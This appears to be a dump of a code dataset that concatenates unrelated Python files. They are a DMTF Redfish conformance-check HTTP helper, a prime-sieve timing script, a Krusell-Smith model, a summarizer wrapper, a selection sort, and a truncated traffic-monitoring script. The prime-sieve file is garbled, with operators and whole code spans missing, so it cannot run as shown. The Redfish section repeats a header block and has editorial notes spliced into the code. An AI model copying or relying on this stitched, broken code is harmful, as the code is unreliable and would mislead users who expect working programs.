requests\n# 3. recieves the response\n# \n# Arguments:\n# http_req: the request type (GET, DELETE... 
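# --- Editor's note: concretely, http__set_auth_header/get_auth_encoded above
# produce RFC 7617 Basic credentials, e.g. for login "root", password "calvin":
#   base64(b"root:calvin") -> "cm9vdDpjYWx2aW4="
#   rq_headers["Authorization"] == "Basic cm9vdDpjYWx2aW4="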
etc)\n# resource_uri: the uri of the redfish resource\n# rq_headers: the reqeuest headers\n# rq_body: the body of the request in json format\n# auth_on_off: if set to 'on' then authorization is enabled for the request \n# by adding the 'Authorization' header to the request; else the request\n# is made without this function adding authorization parameters into \n# the request headers\n#\n# Returns:\n# response: the response recieved \n###############################################################################################\ndef http__req_resp(sut_prop, http_req, resource_uri, rq_headers, rq_body, auth_on_off) :\n\n if (rq_headers == None):\n rq_headers = create_request_headers()\n\n # default to https unless overridden via \"UseHttp\" in the SUT config\n proto = \"https\"\n if \"UseHttp\" in sut_prop:\n use_http = sut_prop.get(\"UseHttp\").lower()\n if use_http in [\"yes\", \"true\", \"on\"]:\n proto = \"http\"\n\n url = None\n # if dsn name is not prepended to the uri, then prepend uri with https protocol and dnsname as per redfish service requirement\n if sut_prop['DnsName'] not in resource_uri:\n url = urlparse(proto + \"://\" + sut_prop['DnsName'] + resource_uri)\n else:\n url = urlparse(resource_uri)\n \n if not url:\n print('Could not parse the url %s' % resource_uri)\n exit(0)\n else:\n url_ip = url.netloc\n url_path = url.path\n\n if url.scheme == 'https':\n ### get fresh connection\n server_connection = Connect_Server_NoSSL(sut_prop, url_ip)\n # handle http, for conformance test purpose, sometimes we use http\n elif url.scheme == 'http':\n server_connection = Connect_Server_NoSSL_NoHTTPS(sut_prop, url_ip)\n else:\n server_connection = Connect_Server_NoSSL(sut_prop, url_ip)\n\n # setup auth header: set login name and password for the sut_prop...\n if (auth_on_off == 'on'):\n http__set_auth_header(rq_headers, sut_prop['LoginName'], sut_prop['Password'])\n\n # issue the http request\n try:\n server_connection.request(http_req, url_path, headers=rq_headers, body=rq_body)\n except:\n exc_str = sys.exc_info()[0]\n print ('OPERATIONAL ERROR: %s Request for %s FAILED with exeption: %s' % (http_req, url_path, exc_str)) \n return \n else:\n # receive the response and payload\n try:\n response = server_connection.getresponse()\n except:\n exc_str = sys.exc_info()[0]\n print ('OPERATIONAL ERROR: %s getresponse() for %s failed with exeption: %s - exiting test..' % (http_req, url_path, exc_str))\n return\n else:\n return(response)\n#\n## end http__req_resp\n\n\n###############################################################################################\n# Name: http__req_common() \n# Description: \n# common code for the http requests -- this function processes response headers\n# for gzip as well as redirect prior to returning the payload\n# \n# Arguments:\n# http_req: the request type (GET, DELETE... etc)\n# resource_uri: the uri of the redfish resource\n# rq_headers: the reqeuest headers\n# rq_body: the body of the request in json format\n# auth_on_off: if set to 'on' then authorization is enabled for the request \n# by adding the 'Authorization' header to the request; else the request\n# is made without this function adding authorization parameters into \n# the request headers\n#\n# Returns:\n# r_payload: this is the response payload. 
\n\n###############################################################################################\n# Name: http__req_common() \n# Description: \n# common code for the http requests -- this function processes response headers\n# for gzip as well as redirect prior to returning the payload\n# \n# Arguments:\n# http_req: the request type (GET, DELETE... etc)\n# resource_uri: the uri of the redfish resource\n# rq_headers: the request headers\n# rq_body: the body of the request in json format\n# auth_on_off: if set to 'on' then authorization is enabled for the request \n# by adding the 'Authorization' header to the request; else the request\n# is made without this function adding authorization parameters into \n# the request headers\n#\n# Returns:\n# r_payload: this is the response payload. If the response headers specify\n# gzip encoding then the payload is un-gzip'd prior to return - otherwise\n# it is returned as received from the server\n# r_headers: response headers (keys converted to lower case)\n# response.status: the http status code returned from the request \n###############################################################################################\ndef http__req_common(sut_prop, http_req, resource_uri, rq_headers, rq_body, auth_on_off, cookie_info = None) :\n    ## issue the base request/get the response\n    r_response = http__req_resp(sut_prop, http_req, resource_uri, rq_headers, rq_body, auth_on_off)\n    if r_response:\n        try:\n            r_payload = r_response.read()\n        except:\n            exc_str = sys.exc_info()[0]\n            print(\"Error trying to read http response: %s\" % exc_str)\n        else:\n            # get the headers associated with the response;\n            # convert the keys to lowercase so that string searches can be made w/o concern for case.. \n            r_headers = dict()\n            for key, value in r_response.getheaders():\n                key = key.lower()\n                if key in r_headers:\n                    r_headers[key] += ',' + value\n                else:\n                    r_headers[key] = value\n\n            # handle any http redirect... recursive call here... \n            if (\"location\" in r_headers.keys()) and (r_headers['location'] != resource_uri and r_response.status >= 300 and r_response.status < 400):\n                redirected_resource_uri = urlparse(r_headers['location'])\n                return(http__req_common(sut_prop, http_req, redirected_resource_uri.path, rq_headers, rq_body, auth_on_off, cookie_info))\n\n            if not r_response.status:\n                print('SERVICE ERROR: No Response Status found for request %s:%s' % (http_req, resource_uri))\n\n            if cookie_info:\n                cookie_detail = tuple()\n                # set cookie True if Set-Cookie is found; the service is not expected to return Cookies in the header\n                if 'set-cookie' in r_headers.keys():\n                    cookie_info[0] = True\n                    cookie_info[2] += 1\n                    # set details of the request type and url where the cookie was found\n                    cookie_detail = (http_req , resource_uri)\n                    cookie_info[1].append(cookie_detail)\n \n\n            # check to see if the payload is gzip'd - if so un-gzip it\n            if ('content-encoding' in r_headers.keys()):\n                if (r_headers['content-encoding'] == 'gzip'):\n                    # un-gzip the payload\n                    try:\n                        if (Python3 == True):\n                            gz_payload = gzip.GzipFile(fileobj=BytesIO(r_payload))\n\n                        else: # Python2\n                            gz_payload = gzip.GzipFile(fileobj=StringIO(r_payload))\n \n                        r_payload = gz_payload.read()\n\n                    except:\n                        exc_str = sys.exc_info()[0]\n                        print(\"Error trying to un-gzip payload: %s\" % exc_str)\n\n            # if a payload is returned in json format then load it into a json dictionary here...\n            is_json = False\n            if 'content-type' in r_headers.keys() :\n                if ('application/json' in r_headers['content-type']):\n                    is_json = True\n                    if (r_payload) : # if there is a resp payload ...\n                        try:\n                            r_payload = json.loads(r_payload.decode('utf-8'))\n                        except:\n                            exc_str = sys.exc_info()[0]\n                            print (\"Error trying to load %s payload to JSON: %s\" % (resource_uri, exc_str))\n            ''' \n            #log dump \n            # dump the response headers and payload to the text log file\n            if (is_json == True):\n                if (r_payload):\n                    print(\"response: %s %s\" % (json_string(r_headers), json_string(r_payload)) )\n                else:\n                    print(\"response: %s\" % json_string(r_headers) )\n \n            else:\n                if (r_payload):\n                    print(\"response: %s %s\" % (r_headers, r_payload)) \n                else:\n                    print(\"response: %s\" % r_headers) \n            '''\n\n            return (r_payload, r_headers, r_response.status)\n\n    else:\n        #print('WARN: No response retrieved from %s' %(resource_uri))\n        return None, None, None\n#\n## end http__req_common\n
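# [Editor's note] Editorial addition, not original source: a self-contained
# sketch of the gzip branch above -- compress a payload, then un-gzip it the
# same way http__req_common does on the Python 3 path.
import gzip
from io import BytesIO
raw = b'{"Name": "Service Root"}'
gz_body = gzip.compress(raw)        # stand-in for a gzip'd response body
assert gzip.GzipFile(fileobj=BytesIO(gz_body)).read() == raw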
\n###############################################################################################\n# Name: http__modify_resource() \n# Description: issue a request to the server connection/URI which\n# modifies a resource (POST, PATCH, PUT, DELETE)\n# \n# Arguments:\n# rq_type: POST, PATCH, PUT or DELETE\n# resource_uri: the uri of the redfish resource\n# rq_headers: the request headers. If Content-Type is not specified\n# then this routine will set it to json before making the request. \n# rq_body: the body of the request. this can be json or a python dict - this routine \n# converts it to json for the request\n# auth_on_off: if set to 'on' then authorization is enabled for the request \n# by adding the 'Authorization' header to the request; else the request\n# is made with no authorization parameters specified in the request headers \n#\n# Returns:\n# r_payload: this is the json response payload\n# r_headers: response headers (keys converted to lower case)\n# r_status: the http status code returned from the request\n###############################################################################################\ndef http__modify_resource(sut_prop, rq_type, resource_uri, rq_headers, rq_body, auth_on_off) :\n\n    if (rq_headers == None):\n        rq_headers = create_request_headers()\n \n    # this routine can take a python dictionary as a request body... or json;\n    # make sure the request is in json format..\n    if rq_body:\n        rq_body = json.dumps(rq_body)\n\n    # issue the request\n    return(http__req_common(sut_prop, rq_type, resource_uri, rq_headers, rq_body, auth_on_off ))\n\n#\n## end http__modify_resource\n\n###############################################################################################\n# Name: http__GET(sut_prop, resource_uri, rq_headers, auth_on_off, cookie_info = None) \n# Issue a GET request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, authorization 'on' or 'off',\n# optional cookie info to track cookies in request response\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__GET(sut_prop, resource_uri, rq_headers, auth_on_off, cookie_info = None ) : \n    if (rq_headers == None):\n        rq_headers = create_request_headers()\n    # issue the GET on the resource...\n    return (http__req_common(sut_prop, \"GET\", resource_uri, rq_headers, None, auth_on_off, cookie_info))\n\n#\n## end http__GET\n
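# [Editor's note] Editorial addition, not original source: a hedged usage
# sketch of http__GET. The sut_prop dict shown is a minimal made-up stand-in
# for the real properties.json configuration, so the example is left commented
# out rather than executed.
#   sut_prop = {'DnsName': 'bmc.example.org', 'DisplayName': 'SUT',
#               'LoginName': 'root', 'Password': 'calvin'}
#   json_payload, headers, status = http__GET(sut_prop, '/redfish/v1', None, 'on')
#   if status == 200 and 'application/json' in headers.get('content-type', ''):
#       print(json_payload['RedfishVersion'])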
\n###############################################################################################\n# Name: http__POST(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) \n# Issue a POST request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, request body, authorization \n# 'on' or 'off'\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__POST(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) :\n    if (rq_headers == None):\n        rq_headers = create_request_headers()\n    return(http__modify_resource(sut_prop, \"POST\", resource_uri, rq_headers, rq_body, auth_on_off))\n\n#\n## end http__POST\n\n###############################################################################################\n# Name: http__TRACE(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off, cookie_info = None) \n# Issue a TRACE request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, request body, authorization \n# 'on' or 'off', optional cookie info to track cookies in request response\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__TRACE(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off, cookie_info = None) :\n    if (rq_headers == None):\n        rq_headers = create_request_headers()\n    return(http__req_common(sut_prop, \"TRACE\", resource_uri, rq_headers, rq_body, auth_on_off, cookie_info ))\n\n#\n## end http__TRACE\n\n###############################################################################################\n# Name: http__OPTIONS(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) \n# Issue an OPTIONS request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, request body, authorization \n# 'on' or 'off', optional cookie info to track cookies in request response\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__OPTIONS(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off, cookie_info = None) :\n    if (rq_headers == None):\n        rq_headers = create_request_headers()\n    return(http__req_common(sut_prop, \"OPTIONS\", resource_uri, rq_headers, rq_body, auth_on_off, cookie_info ))\n\n#\n## end http__OPTIONS\n\n###############################################################################################\n# Name: http__PATCH(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) \n# Issue a PATCH request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, request body, authorization \n# 'on' or 'off'\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. 
\n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__PATCH(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) :\n if (rq_headers == None):\n rq_headers = create_request_headers()\n return(http__modify_resource(sut_prop, \"PATCH\", resource_uri, rq_headers, rq_body, auth_on_off))\n#\n## end http__PATCH\n\n###############################################################################################\n# Name: http__PUT(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) \n# Issue a PUT request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, request body authorization \n# 'on' or 'off'\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__PUT(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) :\n if (rq_headers == None):\n rq_headers = create_request_headers()\n return(http__modify_resource(sut_prop, \"PUT\", resource_uri, rq_headers, rq_body, auth_on_off))\n\n#\n## end http__PUT\n\n###############################################################################################\n# Name: http__HEAD(sut_prop, resource_uri, rq_headers, auth_on_off, cookie_info = None) \n# Issue a HEAD request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, authorization 'on' or 'off'\n# optional cookie info to track cookies in request response\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__HEAD(sut_prop, resource_uri, rq_headers, auth_on_off, cookie_info = None) :\n if (rq_headers == None):\n rq_headers = create_request_headers()\n return(http__req_common(sut_prop, \"HEAD\", resource_uri, rq_headers, None, auth_on_off, cookie_info))\n#\n## end http__HEAD\n\n\n###############################################################################################\n# Name: http__DELETE(sut_prop, resource_uri, rq_headers, auth_on_off) \n# Issue a DELETE request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, authorization 'on' or 'off'\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. 
\n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__DELETE(sut_prop, resource_uri, rq_headers, auth_on_off) :\n    if (rq_headers == None):\n        rq_headers = create_request_headers()\n    return(http__modify_resource(sut_prop, \"DELETE\", resource_uri, rq_headers, None, auth_on_off))\n\n#\n## end http__DELETE\n\n###############################################################################################\n# Name: create_request_headers() \n# Creates the required request headers used globally throughout rfs_check.py; additional headers \n# can be added as per assertion requirements\n# Return:\n# request header dictionary\n# Note: set all headers that are expected to be recognized by the service as per the spec\n###############################################################################################\ndef create_request_headers():\n    rq_headers = dict() \n    rq_headers['Accept'] = accept_type['json']\n    rq_headers['Content-Type'] = 'application/json'\n    rq_headers['OData-Version'] = default_odata_version\n    return rq_headers\n \n###############################################################################################\n# Name: HTTP_status_string(HTTP_status_code) \n# Takes an HTTP status code in integer form and maps it to a string form\n# Return:\n# String version of HTTP code \n###############################################################################################\ndef HTTP_status_string(HTTP_status_code):\n    return (str(responses[HTTP_status_code]))\n\n###############################################################################################\n# Name: json_string(json_text) \n# Takes a json payload in dictionary format and returns it in a readable format \n###############################################################################################\ndef json_string(json_text) :\n    return(json.dumps(json_text, indent=2, separators=(',', ': ')))\n
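# [Editor's note] Editorial addition, not original source: HTTP_status_string
# above relies on the stdlib status-to-reason table (imported as `responses`).
# A minimal Python 3 illustration:
from http.client import responses
assert responses[200] == "OK"
assert responses[404] == "Not Found"
# e.g. HTTP_status_string(405) would yield "Method Not Allowed"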
\n###############################################################################################\n# Name: json_get_key_value(json_text, key) \n# Takes a json payload dictionary and a key. Finds and returns a value for the key in the payload \n###############################################################################################\ndef json_get_key_value(json_text, key) :\n    status = False\n    val = None\n\n    for skey, value in json_text.items():\n        if (key.lower() == skey.lower()):\n            status = True\n            # found the key...\n            if value:\n                if isinstance(value, dict):\n                    for val in value.keys(): \n                        break\n                elif isinstance(value, str) or isinstance(value, list) :\n                    val = value\n            break\n\n    return(status, val)\n\n###############################################################################################\n# Name: parse_odata_type(odata_type)\n# Parses an @odata.type into namespace and typename strings\n# Return:\n# namespace string, typename string \n############################################################################################### \ndef parse_odata_type(odata_type):\n    namespace = None\n    typename = None\n    if '#' in odata_type:\n        odata_type = odata_type.split('#')[1]\n\n    split_type = odata_type.rsplit('.', 1)\n    if len(split_type) > 1:\n        namespace = split_type[0]\n        typename = split_type[1] \n\n    return namespace, typename\n\n###############################################################################################\n# Name: parse_unversioned_odata_type(odata_type)\n# Parses an @odata.type into namespace and typename strings. Removes the version from the namespace \n# Return:\n# typename string (note: despite the name, only the typename is returned) \n############################################################################################### \ndef parse_unversioned_odata_type(odata_type):\n    namespace = None\n    typename = None\n    if '#' in odata_type:\n        odata_type = odata_type.split('#')[1]\n\n    split_type = odata_type.rsplit('.', 1)\n    if len(split_type) > 1:\n        namespace = split_type[0]\n        typename = split_type[1] \n\n    if namespace and '.' in namespace:\n        namespace = namespace.split('.')[0]\n\n    return typename\n\n###############################################################################################\n# Name: get_resource_json_metadata(namespace, json_directory)\n# Takes namespace string and directory path for json schemas. 
Walks the direcotry to find the\n# json schema for that namespace and loads json in a string\n# Return:\n# If found, returns string loaded with json schema and schema file path\n############################################################################################### \ndef get_resource_json_metadata(namespace, json_directory): \n for dirpath, dirnames, files in os.walk(json_directory):\n for schema_file in files:\n if (namespace + '.json') == schema_file:\n json_file = os.path.join(dirpath, schema_file)\n if json_file:\n with open(json_file) as data_file: \n data = json.load(data_file)\n return data, schema_file\n return None, None\n","repo_name":"DMTF/Redfish-Service-Conformance-Check","sub_path":"rf_utility.py","file_name":"rf_utility.py","file_ext":"py","file_size_in_byte":32168,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"21934802417","text":"#EFFICIENCY\r\nfrom math import sqrt\r\nfrom time import time\r\n\r\nLIMIT = 1 * 10 ** 6\r\n\r\nstart = time()\r\n\r\nsqrtlim=sqrt(float(LIMIT))\r\npp=2\r\nep=[pp]\r\nss=[pp]\r\npp+=1\r\ni=0\r\nrss=[ss[0]]\r\ntp=[pp]\r\nxp=[]\r\npp+=ss[0]\r\nnpp=pp\r\ntp.append(npp)\r\nrss.append(rss[i]*tp[0])\r\nwhile nppint(LIMIT): break\r\n\t\t\t\t\t\tif npp<=rss[i]+1: pp=npp\r\n\t\t\t\t\t\tsqrtnpp=sqrt(npp)\r\n\t\t\t\t\t\ttest=True\r\n\t\t\t\t\t\tfor q in tp:\r\n\t\t\t\t\t\t\t\tif sqrtnppint(LIMIT): break\r\n\t\tif npp>int(LIMIT): break\r\n\t\tlrpp=pp\r\n\t\tnss=[]\r\n\t\twhile pp<(rss[i]+1)*2-1:\r\n\t\t\t\tfor n in ss:\r\n\t\t\t\t\t\tnpp=pp+n\r\n\t\t\t\t\t\tif npp>int(LIMIT): break\r\n\t\t\t\t\t\tsqrtnpp=sqrt(npp)\r\n\t\t\t\t\t\ttest=True\r\n\t\t\t\t\t\tfor q in tp:\r\n\t\t\t\t\t\t\t\tif sqrtnppint(LIMIT): break\r\n\t\tif npp>int(LIMIT): break\r\n\t\tss=nss\r\n\t\tep.append(tp[0])\r\n\t\tdel tp[0]\r\n\t\trss.append(rss[i]*tp[0])\r\n\t\tnpp=lrpp\r\ni=nss=npp=n=sqrtnpp=test=q=r=lrpp=rss=ss=pp=sqrtlim=0\r\nep.reverse()\r\n[tp.insert(0,a) for a in ep]\r\ntp.reverse()\r\n[xp.insert(0,a) for a in tp]\r\n\r\nfinish = time()\r\nelapsed = finish - start\r\nprint(\"%.3f\" % elapsed)","repo_name":"hathix/prime-algorithms","sub_path":"efficiency.py","file_name":"efficiency.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"19303342199","text":"import numpy as np\nimport scipy.optimize as opt\nimport utils\nimport het_block as het\nfrom simple_block import simple\n\n\n'''Part 1: HA block'''\n\n\ndef backward_iterate(Va_p, Pi_p, a_grid, e_grid, r, w, beta, eis):\n \"\"\"Single backward iteration step using endogenous gridpoint method for households with CRRA utility.\n\n Order of returns matters! 
backward_var, assets, others\n\n Parameters\n ----------\n Va_p : np.ndarray\n marginal value of assets tomorrow\n Pi_p : np.ndarray\n Markov transition matrix for skills tomorrow\n a_grid : np.ndarray\n asset grid\n e_grid : np.ndarray\n skill grid\n r : float\n ex-post interest rate\n w : float\n wage\n beta : float\n discount rate today\n eis : float\n elasticity of intertemporal substitution\n\n Returns\n ----------\n Va : np.ndarray, shape(nS, nA)\n marginal value of assets today\n a : np.ndarray, shape(nS, nA)\n asset policy today\n c : np.ndarray, shape(nS, nA)\n consumption policy today\n \"\"\"\n uc_nextgrid = (beta * Pi_p) @ Va_p\n c_nextgrid = uc_nextgrid ** (-eis)\n coh = (1 + r) * a_grid[np.newaxis, :] + w * e_grid[:, np.newaxis]\n a = utils.interpolate_y(c_nextgrid + a_grid, coh, a_grid)\n utils.setmin(a, a_grid[0])\n c = coh - a\n Va = (1 + r) * c ** (-1 / eis)\n return Va, a, c\n\n\nhousehold = het.HetBlock(backward_iterate, exogenous='Pi', policy='a', backward='Va')\n\n\n'''Part 2: Simple Blocks'''\n\n\n@simple\ndef firm(K, L, Z, alpha, delta):\n r = alpha * Z * (K(-1) / L) ** (alpha-1) - delta\n w = (1 - alpha) * Z * (K(-1) / L) ** alpha\n Y = Z * K(-1) ** alpha * L ** (1 - alpha)\n return r, w, Y\n\n\n@simple\ndef mkt_clearing(K, A):\n asset_mkt = K - A\n return asset_mkt\n\n\n'''Part 3: Steady state'''\n\n\ndef ks_ss(lb=0.98, ub=0.999, r=0.01, eis=1, delta=0.025, alpha=0.11, rho=0.966, sigma=0.5, nS=7, nA=500, amax=200):\n \"\"\"Solve steady state of full GE model. Calibrate beta to hit target for interest rate.\"\"\"\n # set up grid\n a_grid = utils.agrid(amax=amax, n=nA)\n e_grid, _, Pi = utils.markov_rouwenhorst(rho=rho, sigma=sigma, N=nS)\n\n # solve for aggregates analytically\n rk = r + delta\n Z = (rk / alpha) ** alpha # normalize so that Y=1\n K = (alpha * Z / rk) ** (1 / (1 - alpha))\n Y = Z * K ** alpha\n w = (1 - alpha) * Z * (alpha * Z / rk) ** (alpha / (1 - alpha))\n\n # figure out initializer\n coh = (1 + r) * a_grid[np.newaxis, :] + w * e_grid[:, np.newaxis]\n Va = (1 + r) * (0.1 * coh) ** (-1 / eis)\n\n # solve for beta consistent with this\n beta_min = lb / (1 + r)\n beta_max = ub / (1 + r)\n beta, sol = opt.brentq(lambda bet: household.ss(Pi=Pi, a_grid=a_grid, e_grid=e_grid, r=r, w=w, beta=bet, eis=eis,\n Va=Va)['A'] - K, beta_min, beta_max, full_output=True)\n if not sol.converged:\n raise ValueError('Steady-state solver did not converge.')\n\n # extra evaluation to report variables\n ss = household.ss(Pi=Pi, a_grid=a_grid, e_grid=e_grid, r=r, w=w, beta=beta, eis=eis, Va=Va)\n ss.update({'Z': Z, 'K': K, 'L': 1, 'Y': Y, 'alpha': alpha, 'delta': delta, 'goods_mkt': Y - ss['C'] - delta * K})\n\n return ss\n","repo_name":"EmilHP/sequence-jacobian-master","sub_path":"krusell_smith.py","file_name":"krusell_smith.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"36378614848","text":"from src.backbone import WindowEmbedder, Generator, Extractor\n\n\nclass SubtextSummarizer:\n '''\n Info:\n Arguments:\n args\n ckpt_path: path to the pre-trained kobertsum weights\n '''\n def __init__(self, args=None, ckpt_path='', input_script=[]):\n self.args = args\n self.ckpt_path = ckpt_path\n self.input_script = ['\\n'.join(script) for script in input_script]\n \n def summarize_subtexts(self):\n # extractive summary\n if self.args.summarizer_type == 'ext':\n summarizer = Extractor(args=self.args, use_gpu=True, checkpoint_path=self.ckpt_path)\n else:\n summarizer = 
Generator(args=self.args, use_gpu=True, checkpoint_path=self.ckpt_path)\n\n        summary_result = []\n        for src in self.input_script:\n            summary = summarizer.summarize(src, \"\\n\")\n            if self.args.summarizer_type == 'ext':\n                summary = self._sort_summary(summary)\n            summary_result.append(summary)\n        \n        return summary_result\n    \n    def _sort_summary(self, summary_input):\n        '''\n        Info: Sort the summary result in ascending order\n        '''\n        summary_text = summary_input[0][0].split('. ')\n        summary_idx = summary_input[1][0]\n        to_sort = list(zip(summary_text, summary_idx))\n        \n        to_sort.sort(key=lambda x: x[1])\n        sorted_summary = [cont[0] for cont in to_sort]\n        \n        return sorted_summary","repo_name":"euisuk-chung/youtube_summarizer","sub_path":"src/subtext/src/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"19738527554","text":"# Selection Sort\n\ndef selection_sort(arr,n):\n    for i in range(n-1): # loop from index 0 to the second-to-last element (n-2); by the time the last index is reached, the remaining element is already in place\n        lower = i # initially take index i as the position of the smallest element \n        for j in range(lower+1,n): # scan from index i+1 to the last index \n            if arr[j] < arr[lower]: # check whether this element is smaller than the current minimum\n                lower = j # if so, record its index as the new minimum \n        if lower != i: # swap only if a smaller element was found at an index other than i\n            # swapping: exchange arr[i] with the smallest element found, arr[lower]\n            # temp = arr[i]\n            # arr[i] = arr[lower]\n            # arr[lower] = temp \n            arr[i], arr[lower] = arr[lower], arr[i] # swapping\n    \n    return arr\n\nlimit = int(input())\narray = [ int(input()) for i in range(limit) ]\n\nprint(selection_sort(array,limit))","repo_name":"Sahal-Rasheed/Python-Guide","sub_path":"sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
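# [Editor's note] Editorial addition, not original source: a quick runnable
# sanity check for selection_sort above, using a hard-coded list in place of
# the interactive input() calls. The values are made up for illustration.
demo = [29, 10, 14, 37, 14]
assert selection_sort(demo, len(demo)) == [10, 14, 14, 29, 37]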
 +{"seq_id":"40893115263","text":"#!/usr/bin/env python2\nfrom __future__ import print_function, division\nimport os\nimport sys\nimport json\n\nimport cv2\nimport numpy as np\nfrom pprint import pprint\n\npath_this = os.path.abspath (os.path.dirname (__file__))\nsys.path.append (os.path.join (path_this, '..', '..'))\n\nfrom geometry import get_extreme_tan_point, Line, get_extreme_side_point, find_right_most_point\nfrom util import *\nfrom iterator import FrameIterator\nfrom background import BackgroundModel\n\ndef draw_polylines (img, corner, color=(0,0,255), thickness=5) : \n    img = img.copy ()\n\n    cornerInt = []\n    for c in corner : \n        cornerInt.append (tuple ([int (_) for _ in c]))\n\n    corner = np.array (corner, np.int32)\n    corner = corner.reshape ((-1, 1, 2))\n\n    cv2.polylines (img, [corner], True, color, thickness)\n    return img\n\ndef get_corner_ground (vp1, vp2, points) : \n    # convention of points : \n    # [left, top, right, bottom]\n\n    lines = [\n        Line.from_two_points (vp1, points[0]), # left line\n        Line.from_two_points (vp2, points[1]), # top line\n        Line.from_two_points (vp1, points[2]), # right line\n        Line.from_two_points (vp2, points[3]) # bottom line\n    ]\n\n    corner = (\n        lines[0].get_intersection (lines[1]), # top left corner\n        lines[1].get_intersection (lines[2]), # top right corner\n        lines[2].get_intersection (lines[3]), # bottom right corner\n        lines[3].get_intersection (lines[0]) # bottom left corner\n    )\n    \n    return corner\n\ndef TSI_get_contours (frame_binary, min_area=200, min_width=70) :\n    contours_selected = []\n\n    im2, contours, hierarchy = cv2.findContours(\n        frame_binary, \n        cv2.RETR_TREE, \n        cv2.CHAIN_APPROX_SIMPLE\n    )\n\n    # select contours whose area is greater than the specified $min_area and\n    # that are not part of another contour (specified by the hierarchy);\n    # additionally, the bounding-box height must be greater than $min_width\n    for c_idx, c in enumerate (contours) :\n        (x,y, w, h) = cv2.boundingRect (c)\n        if cv2.contourArea(c) > min_area and hierarchy[0][c_idx][3] < 0 and \\\n            h > min_width:\n            contours_selected.append (c)\n\n    return contours_selected\n\nVP = VPLoader ()\n\nVIEW = (\"right\", \"center\", \"left\")\nwith open (\"/home/adib/My Git/traffic-monitoring/data/sync_25fps/common_point/result.json\", \"r\") as f_buf : \n    GT = json.load (f_buf)\n\ncv2.namedWindow ('default', flags=cv2.WINDOW_NORMAL)\nimg_path = '/home/adib/My Git/traffic-monitoring/data/gt/2016-ITS-BrnoCompSpeed/dataset/session{}_{}/screen.png'\n\nses_id = 5 \nvp = VP.get_session (ses_id)\nfi = FrameIteratorLoader.get_session (ses_id)\n\nM = {} # matrix homography\nts_img = {} # initialization of time spatial image\nprev_img = {} # previous 2 images for 3-frame difference\nprev_tsi = {} # previous 2 TSI images for 3-frame difference\nbms = {} # background model MoG\nVDL_IDX = 100 # column index of VDL\nVDL_SIZE = 5 # size of VDL\nmasks = {} # for masks \ncolor = (0,0,255)\nimgs_color = {} # for saving the color image of each view\nfgs = {}\n\nfor view in VIEW : \n    img = cv2.imread (img_path.format (ses_id, view), 1)\n\n    points = GT['session{}'.format (ses_id)][view]\n    corner = get_corner_ground (vp[view]['vp1'], vp[view]['vp2'], points)\n\n    # get rectangular homography mapping\n    corner_gt = np.float32 (corner)\n    corner_wrap = np.float32 ([[0,300],[0,0], [1000,0], [1000, 300]])\n    M[view] = cv2.getPerspectiveTransform (corner_gt, corner_wrap)\n\n    # background subtraction\n    bms[view] = BackgroundModel (fi[view], detectShadows=False)\n    bms[view].learn (tot_frame_init=2)\n\n    # for initialization\n    ts_img[view] = None\n\n    # for 3 frame difference\n    prev_img[view] = [None, None]\n    for i in range (2) : \n        img = next (fi[view])\n        img_color = img.copy ()\n        img = cv2.cvtColor (img, cv2.COLOR_BGR2GRAY)\n\n        # save background\n        prev_img[view][i] = img \n\n    prev_tsi[view] = [None, None]\n\n    # load mask\n  